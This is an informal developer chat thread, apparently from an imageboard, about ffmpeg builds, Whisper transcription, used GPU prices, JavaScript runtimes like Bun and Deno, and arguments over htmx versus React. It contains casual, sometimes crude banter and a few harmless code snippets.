--prefix=/ffmpeg_443v_mvc/ffmpeg-arm8/android/arm64-v8a --enable-shared --disable-static --disable-doc --disable-debug --disable-programs --disable-ffmpeg --disable-ffplay --disable-ffprobe --disable-avdevice --disable-doc --disable-symver --disable-stripping --build_suffix=4x --enable-asm --enable-neon --cross-prefix=/ndk-r21/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android23- --target-os=android --arch=aarch64 --extra-libs=-lgcc --enable-cross-compile --sysroot=/ndk-r21/toolchains/llvm/prebuilt/linux-x86_64/sysroot --extra-cflags='-Os -fpic ' --extra-ldflags=' -march=armv8-a -mtune=cortex-a55'
oh I'm an idiot, that guy must have added MVC support to ffmpeg
isn't that a violation of LGPL license though?
he doesn't even mention anywhere that uses ffmpeg, that's clearly violation
should I frighten him into uploading source code?
>You are correct, sadly. The first admin disappeared ages ago ("too busy with real life issues" 🙄, according to himself),
>the second admin appears once in a blue moon, and all the remaining moderators became boringly lazy...
would be better to notify the ffmpeg people
finally good content
I wanna see 1 week in a Vision Pro (without taking it off at all)
you can decode MV-HEVC with both HTM and AVFoundation, what's better
ffmpeg can integrate the latter pretty easily
didnt check any fancy stuff yet but tested a 3 minute scene and whisper-nim barely only made the same mistakes as i would have i cant decipher those few parts either
just two mistakes from the parts it shouda known
try korean
macos didn't like iso but leeseo likes mcdonalds
checked out whisper-large-v3, it solved most of the problem sentences even i couldnt hear
amount of small dumbino mistakes was about the same
>To reduce GPU memory requirements, try any of the following (2. & 3. can affect quality):
>reduce batch size, e.g. --batch_size 4
>use a smaller ASR model --model base
>Use lighter compute type --compute_type int8
gotta use int8 becuase this thing doesn't support aple silicon yet, but it also reduces quality so might be worth renting an online gpu instance for testing
buy 3090
it's even more than your phone although might be more useful too
>it's even more than your phone
I didn't buy it tho
>although might be more useful too
that guy
recommends it the most because many memory and reasonably priced. he argues to buy it used tho
or just buy m3 max 128gb memory
I'm ordering pizza every day in the same pizzeria, am I their best customer like Carmack by now
>While it’s not likely that movies will shift to full stereoscopic capture any time soon, the technology used to separate the different parts of the image for 3D depth separation is becoming more mainstream. With AI-based techniques, computers can segment 2D images more easily, and iPhones have been able to use LiDAR for this purpose for years already. The same tech that helps Cinematic Mode blur out a background can be easily repurposed to bring depth to a flat image, and on-the-fly 3D conversion is possible today.
half the things dont work on m1 nvidia is god now
ye olde 12gb gpu is 200 eur, 3090 is 800eur
on the other hand whisper is prolly the only thing you can do on 12gb. 24gb would also do fast stable diffusion (m1 also does stable diffusion but slo)
considering it now
>considering it now
I won't advice you bad thing, it's worth it, buy it right now
like an impulsive shopping obsessive daemon in your head
why did aymd and intel let nvidia get to this point
>At its core is the Bun runtime, a fast JavaScript runtime designed as a drop-in replacement for Node.js. It's written in Zig and powered by JavaScriptCore under the hood
the fuck, those hipsters not only wrote their stuff in useless Zig, but also used JSC JIT instead of V8
deno bros, we aren't feeling very good anymore...
I thought bun is just a builder like esbuild or parcel
>The bun command-line tool also implements a test runner, script runner, and Node.js-compatible package manager. Instead of 1,000 node_modules for development, you only need bun
wtf, dropping nodejs right now
>Instead of 1,000 node_modules for development
sindresorhus on a suicide watch
I have 32gb on my M1, theoretically I can run 24GB models
but I guess it will work badly...
one feature doesnt seem to work at all without cuda (condition transcription on previous transcriptions)
now i have to get or rent cuda to test if it makes even better subs. whisper should already be conditioned on previous audio so idk tho
half of the stuff isn't even implemented
>rent cuda to test if it makes even better subs
how. cpu/gpu run same algorithm
idk, some int8/fp16 difference means i cant use the feature since apple silicon gpu isnt supported yet
>some int8/fp16
you can run fp16 on cpu and check it
>Requested float16 compute type, but the target device or backend do not support efficient float16 computation
idk, pytorch nightly supports m1 gpu but few libraries check for it yet
tbh I was also thinking about buying good nvidia gpu and putting it into my NAS for DL experiments
I don't think I would use it much tho (like Kindle which I've used like for 5 hours so far )
I only have GTX970 (4GB memory) but I don't think you can run modern stuff on it
or maybe build new gaming PC which I can also use for DL but that would be pretty expensive, especially now
fuck, MacOS + iOS + PlayStation are so much worse than PC + Android in terms of price/value
shouldn't have been trapped into stupid ecosystem...
>do not support efficient float16 computation
or don't need efficiency for testing speech recognition quality
of course cpu would be slower than gpu
you don't* faster whisper with the big boy models seems to fit under 6gb vram
>I don't think I would use it much tho
yeah i should probably start small stable diffusion is kinda boring, and ollama/llm stuff works on m1 already
>stable diffusion is kinda boring
can't you created perfect kwaifu there? or generate some l00d to your taste
I'm too lazy to experiment with that stuff tho. the tyranny of choice in NN fields frightens me
>It's built in Rust, utilizing QuickJS as JavaScript engine, ensuring efficient memory usage and swift startup.
why is everyone rewriting nodejs apis to their own thing
looks stupid
interesting, it doesn't even look complicated to integrate JSC into your code
software development looks mostly simple now
if only I could understand compilers and neural networks...
>1060 6gb 60eur
>quadro p4000/1070 8gb 90eur
>1080 11gb 170eur
>titan x 12gb 180eur
>quadro p5000 16gb 300eur
>3090 24gb 760eur
alrite went through the second hand price points
kinda leaning toward p4000 its so cute but of course only 8gb
maybe i can keep my current dumbass gpu as display gpu and quadro only for compootation
why quadro, you need VRAM, not the fancy stuff
>3090 24gb 760eur
damn I envy your prices
1070 and quadro is the same price
but quadro is cute so what can you do while 1070 is a classic double hamburger
go then with p5000 at least, €300 isn't much like quadros are garbage anyway so maybe ill do the hundred bucks one and see what happens
>uhd bdremux 92GB
should have bought 8TB HDD probably
I still have 2TB free for movies and another 4TB but I don't feel very safe tbh set a basic boy env var
>but Pascal, Maxwell... ehhh~ the entry barrier is Turing, Volta maybe
lol I was looking for similar thing recently
ended up setting it in the Info.plist of the app
tried that at first but
brew services restart x
seems to clear it's over
>Either use launchctl directly or have a custom formula which specifies the plist of your choice.
new "ohno"
>This approach does not seem to bet working for PATH specifically, at least on Sonoma (macOS 14)
maybe it's faster because JSC is faster than V8?
or because Zig is faster than Rust?
most probably because Rust's server library written badly...
anyway, why do we have so many options: nodejs(npm,yarn,pnpm), deno, bun, llrt
I'm fucking tired to choose from those options
you use one thing, then another appears and shills making cool webpage explaining how it's good than anything else
and you need to change everything
why can't they build good stuff from the start
we have only single ffmpeg, single git, single llvm, nobody makes tons of different versions of those't look very good yet
what about deno?
been working great
all without tsconfig.json
at one point i thought there was a ploblem and found is beyond easier to use than swc-node but it was a general problem not deno so not going back to node yet
>interesting, haven't seen it. so it uses esbuild to strip types instead of swc
>all without tsconfig.json
"get-tsconfig": "^4.7.2"
>doesn't look very good yet
what if year later bun becomes good? are you ready to abandon your deno?
quadro is on it's way
it's so tiny and cute
8gb vram? what can you run there?
i already have 8gb vram gpu i'm a total hecking idiot!!!
i totally forgot since i haven't used my tower pc for some years, i was so certain i had a shitty 2gb geforce
>i'm a total hecking idiot!!!
I've got information, it could have been ATEME about arcane knowledge geforce 10x is too old so need mystery env var to use float16 (float32 doesnt fit in 8gb with large models)
>As explained above, FP16 is only enabled for GPUs with Tensor Cores (Compute Capability 7.0 and above)
yeah, old gpus are no good. need at least 3090
not sure I want to work on mv-hevc anymore
not as cool as I thought
maybe if I buy iphone 15 pro and vision pro as a compensation can actually tell whisper-sensei what the show is about and character names on a quick try it solved some problems with character names being mixed up similar sounding words
we love you whisper
oh just a list like that will work cool
how to work on cool stuff if you're too dumb
think i've about maxed out on correctness after trying out multiple tools and biggest models
it will still make a few dumbino mistakes per minute, plus the indecipherable ones are hit or miss.
also alignment is amazing most of the time, but sometimes it can take random noise as character speech so start or end of the line will need to be manually corrected.
not sure if theres anything more fancy i could try. AI thingymagics always have a chance to make a mislabel things.
when dealing with other stuff like a few images if theres another way to relate the images to each other you can still recover automatically if you assume AI will only mislabel one of them.
but is there something like that i could figure out to help with a plain old transcription. some sort of additional context i could use hmm
>not sure if theres anything more fancy i could try
train your own model
>I actually want to use this
wtf is that soyjak
>MIT No Attribution
why not CC0 or UNLICENSE
>Within the first 3 mins of this video, I was already screaming JSON Schema.
lol even his viewers are smarter than him
>not persistent enough to develop some popular project like deno or bun
>not smart enough to develop some cool project like quickjs
what do? I'm feeling like I'm useless in that big wild github world
make a mpv type customizable video player for the web for us chromebook enthusiasts
mpv doesnt work that nice as a linux app on chrome
how would you decode formats chrome doesn't support?
even 4chen plays mpvs on iphones somehow, idk
swdec, but that's stupid>search and categories by spottify
>play songs from the tubes for frei
>someone actually uses Flutter Desktop
>too stupid to work on something cool
>just reading hackernews about deno vs bun
what about an mpv script that seeks a scene change (or whatever its called when no pixel is remotely the same between two frames, like changing from camera 1 to 2 or cut to a new scene)
would make clip making much faster than scrolling frames left and right until i find the exact frame
I want a job where company would buy me vision pro for experiments
>One under-advertised unique feature of Bun is that it supports proper tail calls, thanks to the JavascriptCore runtime.
denobros, we kneel
it's so much cooler to work on V8 or JavaScriptCore, but nobody knows those people, only Ryan who just wrapper V8 with bunch of Rust libs together
this can't be helped
why is it called serverless if there's a server?
>but as soon as we talk about frameworks like Nuclio, OpenWhisk etc. that supposedly you yourself would be running (possibly on a Kubernetes cluster) - the name “serverless” is plain bizarre. Not only you do have to administer your Kubernetes cluster, you also have to administer additional layer on top of it. So what is “serverless”?
typical JS solution. just add another layer of abstraction, it will make everything better, I swear
>TL;DR: It's just a name. Get over it.
>I would love to understand your rationale for defending this confusing buzzword.
I love autistic conversations on HN so much
>It reminds me as a runtime version of Rome tools, which had a similar goal (replace a bunch of software with a single faster one). It went under and has [transition to OSS under a new team](
if both deno and bun integrate their own linters and prettifiers, that means biome devs are doing useless job? welp...
I have the DX buzzword tbh
but it sounds pretty logical, just irrational hate for some reason. maybe because stupid JS devs use it all the time, fighting with mirriad of node_modules
>You can replace npm run with bun run to save 150ms milliseconds every time you run a command.
yeah, right, glad I'm not the only one who noticed retardness of nodejs >>1015474
>One of the reasons why Bun bet on JavaScriptCore instead of embracing the server-side V8 monoculture is because JavaScriptCore and WebKit/Safari are strongly tied together. This means that Bun can often use implementations of Web APIs from WebKit/Safari directly, without having to reimplement them. This is a great example of that.
weird reason
>We're a full-stack TypeScript shop, and I manage ~50 internal libs and ~500K LOC of TS. Last month I tested out both Deno and Bun as alternative runtimes for us. TLDR: for any semi-complex codebase we have, Bun almost always works, Deno almost never works. We now run all our tests in both Node.js and Bun, and gave up on trying to make Deno happen.
try to upload those pics >>1033603 ➡
that guy was thinking MongoDB and Clojure is the hottest stuff
that's not stupid
>ryan dahl says math is not necessary
>ryan dahl says math is not necessary
ah, it's in the video
>Ryan has publicly said some things over the years that he may regret. Whatever. People should be free to say stupid things and not be made a Pariah. I wish he hadn’t deleted his Twitter account. I have the utmost respect for Ryan’s work — his accomplishments speak for themselves.
i guess he had a fun hot takes twitter account wonder if it's archived somewhere
>Ryan has publicly said some things over the years that he may regret. Whatever. People should be free to say stupid things and not be made a Pariah
if only that person knew about modern cancel culture
>That’s the case because operating a piece of technology at a professional level turns out to be really hard. It’s easy to get started with a lot of technology, but harder to do a really good job with it.
>This is why. Adding the technology is easy, living with it is hard. These are all the things you have to worry about.
>I could brew install a new database right here right now while giving this talk, and start writing some data to it. God help me I could, don’t make me do it. But it’s another matter entirely to run that thing in production at a professional level.
I think the same
inb4 just run a bunch of kubernet clusters with monitoring in docker, all configured with ansible playbook and be happy with it
that guy is funny
on one hand I probably should use simple popular stuff like react/next.js/v0
on the other I want my app to be fast and cool, so I need to configure everything manually and heavily tune
but by doing so I will be tired soon and lose any interest in doing the actual app
this can't be helped
>I wasted a day trying to get vite to work when they first announced it. Really excited about not needing >1gb of ram to compile a react project... Boggles my mind that react bundling uses more RAM than compiling linux.
the absolute state of JS
>Performance-wise their claims are suspect, safari js engine was always better at startup and memory use at the expense of a relatively weak JIT. They paired that up with a ton of stuff reimplemented in native code to make their cli and hello world workflows fast. This means people will be in for a perf surprise when they start bottlenecking in JS hotpaths.
this part is cool macros are kinda yikerino
I stopped reading on this part
>Custom allocators make manual memory management a breeze. Zig has a debug allocator that maintains memory safety in the face of use-after-free and double-free. It automatically detects and prints stack traces of memory leaks.
so their safety guarantees is "we will print you warning about bad allocation in runtime"
I can't believe people actually use that language in 2024, that's a fucking joke
>A minimal v8 runtime can be recycled very rapidly - 500 processes per second on a single core, with very little variation in results. with static linking we can get close to 600 per second
so amazon with their LLRT is actually full of shit? they just don't know how to tune V8?
knew that
>I love how much it includes out of the box. I wrote a little zero-dependency app in TypeScript. It’s got SQLite, routing, etc. It even understands JSX. The only tricky bit was writing a ~100 line JSX-to-HTML function. It’s quite nice and starts so much faster than the normal Node + npm + essbuild stack.
wtf I like that
>0:36 ways things have just gotten
>0:37 unnecessarily complicated our repos have
>0:40 a thousand node modules and half a dozen
>0:42 configuration files with plugins and
we should make sindresorhus responsible for that
something about CO2 emissions, EU should put sanctions on him because of his disruptive actions
the fellow said all packages already work huh
maybe the puppeteer problems was just bun being hugely more popular and finding more edge cases
dahlerino wasted all his time on the non-npm plan and his serverless platform, deno is finished
>dahlerino wasted all his time on the non-npm plan and his serverless platform, deno is finished
right, that was kinda stupid idea that node can be defeated on a battlefield
>JavaScriptCore is originally derived from KDE's JavaScript engine (KJS) library (which is part of the KDE project)
which quickjs am i right?
the Bellard's
now is the hard question: who is cooler: Carmack or Bellard?
bun's logo looks like a soyjak
is JS on server cool again with the rise of TypeScript and the fall of Go?
you don't need to re-implement rendering twice and TypeScript is good and maybe Bun isn't as bad as Nodejs and can also be compiled to a single file
>Cheap 3090s are ex mining cards abused for 2 years run 24/7/365 days overclocked.
that's why they are so cheap
I'm seriously thinking about this
of course Rust/Go is faster but for most backends they do only simple database/network stuff which isn't CPU-bound at all so JS JIT won't be a bottleneck most of the time
people didn't like nodejs because of dynamic types and node_modules mess but this is getting improved
and single code-base with shared basic types is a huge plus (I hate managing two copies for e.g. Go and JavaScript) although Rust guys may have already implemented something like "Rust bindings for TypeScript interface declaration"
also you can write CPU-intensive code like image resizing in C and call it from JS (like they do in Python all the time). or even WASM, although it's not as fast as native
html is cool again tho no need for el react at the front except for the few pages that need it
>no need for el react at the front except for the few pages that need it
how to make pages dynamic?
you can use fancy stuff for the few parts that need to be dynamic, be it graphs or spreadsheets
the rest of the stuff you keep as simple html pages no need to shackle the entire website into some massive clusterheck like next
>Complexity Budget
sounds like this guy >>1033629 >>1033671
what is that htmlx stuff, is it any good? haven't looked into it yet
>for the few parts that need to be dynamic
dunno, don't most pages have it. or if even 1 page doesn't have right now, most probably you would want some sort of dynamic behavior there too
>what is that htmlx stuff
just a quick way to replace a part of the page from the server
but turns out that is enough for quite a lot of dynamic stuff so people can instead spend the complexity budget on the more difficult parts of the site very smart
>instead spend the complexity budget on the more difficult parts
sounds like another buzzword-driven technology which will disappear in 1 year
speaking of the webshit anyone else hate turbolinks style javascript navigation? like its so useless in the first place (paint holding already exists), and then instead of relying on native navigation they have to simulate back and forward and reload page scroll position restorating with varying success. not to mention form data is no longer saved and cache may or may not work.
github with its billions of dollars budget works like a piece of shit, it's obvious simulated navigation is just not solvable
(go to issues page, open an issue, scroll the issue down and press back. you are now scrolled down in the issues page)
doesn't anyone else notice this? i feel like i'm taking crazy pills
>doesn't anyone else notice this?
I noticed it in code navigation. sometimes it doesn't go to previous directory when you click back
well, I mostly just clone the repo anyway and open in vscode because search on github sucks
also I hate discourse because it tries to be too smart but we've already discussed it before
yeah dir navigation was turbolinks and has always been an absolute disaster. like we're talking years and somehow nobody sees it?
recently github frontend changed to react and now issues too are a scroll position mess
i dont understand
>we're talking years and somehow nobody sees it?
too few people are OCD autists like us, they think like "huh? it didn't work? whatever, I'll click one more time", but it's only us who become angry
still, github is popular because nobody needs super-polished super-optimized apps that much so nobody does them because it's too expensive
except very cool smart guys like Bellard who is capable of creating things however he wants it
>they think like "huh? it didn't work? whatever, I'll click one more time", but it's only us who become angry
the creator of Erlang
lilbro didn't know about LLMs yet
yes it's every website now
googling why htmx is bad
this htmx looks like bullshit tbh
htmx is meant for situation where you would call the server for data anyway why would it add endpoints
i guess what lil bro is looking for is graphql, then you can have a single endpoint (i couldn't do it tho, too dumb for graphql )
I just don't like it for some reason, trying to find examples why it's bad
guess I'm too allergic to new hyped frameworks
there's about 1500 popular web frameworks out there, not worth trying to find bad points for each one
now I hate it even more
fucking smug retarded incompetent devs think if they're good at hyping and marketing, then can push whatever bullshit they like and imply their solution is somehow good
now I will prove why it's retarded and will copy paste that to anyone using it
a type of marketing DHH would like
what makes me angry the most is how smug and self-righteous those people are while providing no actual value
but this looks half-reasonable
I hate them both
that's not the reason
businessy people always get a shock when they open htmx tweeter account but the fellow always explains memes is what sells on the tweeter
not that it matters what you end up using tho some people even use react native on the web successfully
this is retarded
I guess too many 20yo in js dev right now, this can't be helped
>Carson, i am loving HTMX . Like you i am a +20yr java dev guy 😎 I very much prefer HTMX for +90% of use cases over React. HTMX is fantastic 👍 Just made my newest app with HTMX. So easy. So fast.
classic cognitive bias of human species
>this tool is popular so I will be using something else just to be contrarian
clown world
they got me
>not that it matters what you end up using tho
I have to use best thing and explain it to myself why it's the best one
I don't understand how is it any better than the vanilla js
<button hx-post="/clicked" hx-trigger="click" hx-target="#parent-div" hx-swap="outerHTML" > Click Me! </button>
>This tells htmx:
>“When a user clicks on this button, issue an HTTP POST request to ‘/clicked’ and use the content from the response to replace the element with the id parent-div in the DOM”
you can do that in few lines of JS, wtf is wrong with people
is that new JQuery?
remember a few months ago when you learned about tailwind? same thing here
all htmx does is make a request and replace some part of the dom, but you can do it quickly from from html instead of doing it by hand in a separate file or script tag
>same thing here
no this is different. tailwind was solving real problem, but htmx doesn't make sense
>make a request and replace some part of the dom, but you can do it quickly from from html instead of doing it by hand in a separate file or script tag
I can't think about any use case it may be useful at. you either do very little code in vanilla or use some proper JSX framework
give me some example of website where you would use htmx
>quick way to replace a part of the page from the server
>that is enough for quite a lot of dynamic stuff
people were doing that kind of stuff in vanilla JS (or with JQuery back then) decades ago and it turned to be you can't do a lot with HTML partials returned from server. it either makes website brittle or not useful at all
why is that re-iteration of luddites thinking they created something useful? people discarded that idea for a reason
this is just horrible and stupid
I won't even care about that stupid thing
I've seen that idea before btw
but those devs didn't make me feel angry, I guess because they aren't arrogant and smug
they are just like
>here's our small little stuff, use it if you don't like
instead of htmx retarded devs be like
>only soyjaks use react look at them lmao
>use it if you like
>no need to shackle the entire website into some massive clusterheck like next
I was actually thinking about using next.js for my next project
a lot of options tho
but v0 only works with stupid react
>SolidStart currently relies on Node.js APIs that Bun does not yet implement. The guide below uses Bun to initialize a project and install dependencies, but it uses Node.js to run the dev server.
>too many people think they need real-time push when NRT-polling + caching is far easier and more performant
netflixman with the hottest latest boring technology
>First thing is HATEOAS.
>they actually invented their own buzzwords
>The term was coined in 2000
re-discovered old term and started using in their hyped thing
that happens all the time too
>watched few minutes
>my reaction
i got it
make the opposite of firesip: all the bad stuff about web framework x in 100 seconds
it'll be amazing
>people discarded that idea for a reason
>I don't get the HTMX hype. We did away with HTML snippets because:
>1. Don't want thousands of micro HTML endpoints where JS can derive state.
>2. Synchronizing UI outside of the change (check a todo and then change the remaining count)
>3. Pounding the wire (I need to get my entire todo app send back to update one item?)
>4. No escape hatches when complexity runs amok.
>I've made very complex PHP + Ajax apps. I don't want to go back.
>What am I missing?
thank goodness sane people still exist
they're trying to say this is better than React?
I'm dead laughing, people can't be that stupid for real web dev courses but only by netflix, microsoft, stripe people because that means they're legit
couple years back there was a huge launch of masterclass dot com that had courses of various things only by american celebrities. maybe soon there will be a dev courses site with carmack, abramov, sindresorhue etc
>carmack, abramov, sindresorhue
don't put Carmack next to those people
>2. It's not - full-stack Todo app in 50 LoC
the fuck is that
>26 stars
the absolute state of htmx shills
it's framework by the author of the tweet
the fuck those shills are about? you can do inline JS in html too
internet is full of paid shills who are shilling retarted frameworks
>From React to htmx on a real-world SaaS product: we did it, and it’s awesome!
do I have to prove that this is bullshit too? they are obviously paid shills and spending my time
they have many shills even on HN
I guess they just hate JS there so will praise whatever solution claims to be "low JS", like a cargo cult
that retard have essay on every question asked
>I have experience with multiple large applications that use htmx. They scale fine. They just aren't what people are used to right now.
>Give it time and mull it over. It may grow on you.
yeah sure "trust me bro"
>but you can do it quickly from from html instead of doing it by hand in a separate file or script tag
seriously? explain this then:
they extensively use js even in their own examples...
>In the React ecosystem, embraces a much simpler approach than Next.js.
too many options again
build M3 Max, quick
finally bought old game I wanted to play on PS pretty cheap
weren't you supposed to check if v0 works? no no, you should all in on vercel
but next.js doesn't work in bun another menubar app just to keep audio balance from changing randomly
>MacOS bug where your balance may drift when volume buttons are pressed while CPU is under heavy load
import * as path from ""; const cwd = path.dirname(import.meta.url); const command = new Deno.Command("program.exe", { cwd }); await command.output(); // Failed to spawn 'program.exe': No such cwd 'file:///C:/Users/dahl/puppets'
const cwd = path.dirname(import.meta.url).slice("file:///".length);
why didn't deno handle it for me
>why didn't deno handle it for me
to avoid extra allocation on heap
>In V8, when you perform a string slice operation using the slice method or the [start:end] syntax, it creates a new string object that is a view into the original string
no extra allocation
>it creates a new string object
>no extra allocation>JavaScriptCore does run on Windows, but it’s less well supported than Unix
we'll have to get used to deno
don't you use chromebook?
even on Windows it's better to use WSL for development tho
gpu so cute
want it now?
maybe a bit to loud a case like that but other than that holy comfy
you're like a girl choosing a phone because it looks beautiful
i do that too
feels better to live with beautiful things
secretlybut technical specs are still very important
I would never buy stylish magsafe battery pack because not enough capacity and lightning
>writing sql:
>look normal
>cant write dynamic query
>using query builders:
>can write dynamic query
>look increasingly weird especially when big query
nice thing cannot have
halfway through it
a lot of interesting food for thought
I wish I was that cool
a monke brain that is close to solving the most mysterious riddle in a Universe but putting a lot of tiny transistors together
might be even cooler than Bellard
is it any good?
I was thinking about trying one of those nocode-backend stuff one day but dunno where to use it
the problem will all those "1-click" solutions is that there're too many of them
>too dumb for rust
>too dumb for go
>too lazy for rust
>too smart for go
>typescript perfect fit
is there no choice but to let javascript rule the world
dunno. rust could have been a good choice for backend/system programming, but google and cpp and even zip people are too stubborn and killed language with a good design
I don't even want to think what language to write my software in, it's all so tiresome
we should just let AGI Gods manage that mess we created
i wanted to get into the go hype but after learning http requests and json unmarshaling it started to feel so complicated then tried one of them openapi client generators for an api i wanted to use and all i get is segfaults
maybe it really is time for javascript maybe they will welcome my dumb self
this brand new technology will finally let you filter an array in typescript
i can't believe it
7.4k stars for that
>openapi client generators for an api
try something like
I was experimenting with hasura as a backend a bit but dropped that project because too much work
but the idea seems pretty smart: you edit all the database schema in UI and then just write a tiny bit of code on top
though you can maybe use django/rails/next.js with similar productivity instead but not so cool right
all of this seems outdated tbh. why can't ChatGPT agents create CRUD API for you in 5 minutes, why do we still need to manage all of it by hand. the task seems too trivial
maybe if you can use v0 for a client and copilot for a server, then you can be productive too
need experimenting
but I rarely do CRUD so really dunno
but maybe I'm not doing them because I spend too much time on researching available options and tuning every single bit of my setup
maybe v0 nim + next.js is pretty good, and I just need to swallow that bitter react+node_modules pill
I've got sindresorhused
it looks so nice
why d oesnt rust have anything like it component based templating libs are so rare outside javascript>initial commit 2 months ago
are you going to write API by hand?
I'm thinking about something like
>Auth, DBs, Functions and Storage
sounds like supabase. what these projects seem to offer is the fancy admin UI where you can alter your database schema and a react useState thingymagic that you can query db with
what i think i would want instead is some a fun ready to use frontend with pieces like buttons, graphs, blocks, navigation with nice paddings and margins that i could connect to my backend since backend is the fun part
>since backend is the fun part
no not the CRUD part at least
nowadays you do a lot on the client side so you would rather focus on this part and templates/communication with DB is the simplest and dumbest part
this guy continues being dumb
i mean something like got a buncha views and forms with nice margins so you dont need to worry about frontend too much
but its limited you cant make things live update from http or anything so not that usable
>its got a buncha views and forms with nice margins so you dont need to worry about frontend too much
maybe for admin pages. for normal pages you would want to make custom stuff anyway
I don't see how is it better than admin UI for database (like in supabase/appwrite solution) + generated frontend components on v0
is there anything better than v0 where you can also modify code? like Figma?
soon everything will be generated, including kpop
>including kpop
no l00d
maybe there could be an escape hatch for custom stuff
i just really hate that blank page or blank component when starting to write html i dont really mind copying something existing though. is there a place or model where i could generate layouts and components with prompts?
>is there a place or model where i could generate layouts and components with prompts?
I understood that reference
sorry i mean images of the stuff, then i could just copy that really thought it out tho
at the start its easiest to just write the content in html without styling
then something needs a bit of css to fit in view nicely
then its time to pull tailwind and setup auto reload
and then start adjusting everything and padding and margin font sizes, custom buttons
and of course text aligning
flex row and then go through align items, justify items and justify content by setting each to initial or middle or was it baseline
just go through everything and eventually the button will be aligned with the text
im way too dumb for computers
>images of the stuff, then i could just copy that
>at the start its easiest to just write the content in html without styling
>then something needs a bit of css to fit in view nicely
>then its time to pull tailwind and setup auto reload
try next.js
it only solves auto reload it doesnt magically give me nice components that fit my dumb idea
>it doesnt magically give me nice components that fit my dumb idea
why? run create-next-app, then copy-paste code from draw-a-ui
ok, waited 5 days on my new account, I even used
email.I was able to reply to 1 thread just fine, but on the second thread I just can't. I removed all the links and still can't, it adds it to the mod approval queue and of course on that retarded forum nobody gives a fuck about that.
so my only idea is that it doesn't like multi quote? or post length is too big? bug that's beyond being retarded...
now imagine I do 10 more tries, finally let it through the retarded filter. and 1 day dumb mod will finally check the approved queue and let them all pass. that would be fucking embarassing
>multi quote? or post length is too big?
or probably it doesn't like on of the words. of course it would never tell you which one
fucking hate those old retarded forums but important people still post there
ok, I've got an idea. I will post half of the post and will edit and add another half
>I will post half of the post and will edit and add another half
yes, this worked
I'm so fucking smarter than that dumb forum software
I hope they will never approve all my post attempts
I even posted them from different accounts, they would think I'm so evil spammer
I found similar issue on the forum. User posted few short posts just fine, but when he tried to create longer one (without any links, just normal formatting and one quote) he got blackholed.
so antispam reacts on length of the message? that's too retarded
someone responded to my post today
and now it's missing
I did everything I could and it still didn't work???
oh no
the face of typescript
text: generated
audio: generated
video: generated
code: autocompleted
language: translated
chance for kgf: none
why even live
i got this
incredible, not just the colors and contrast but i can see every single frame with zero blur or ghosting
and only 100€ more than my original budget
>240HZ OLED 1440p 98% DCI-P3
what are you gonna game?
even pesky possum doesn't have such a cool monitor
i'm playing dark souls 2 right now so i might continue with 3 and elden ring
also have a thing for arena shooters so the motion clarity is gonna be nice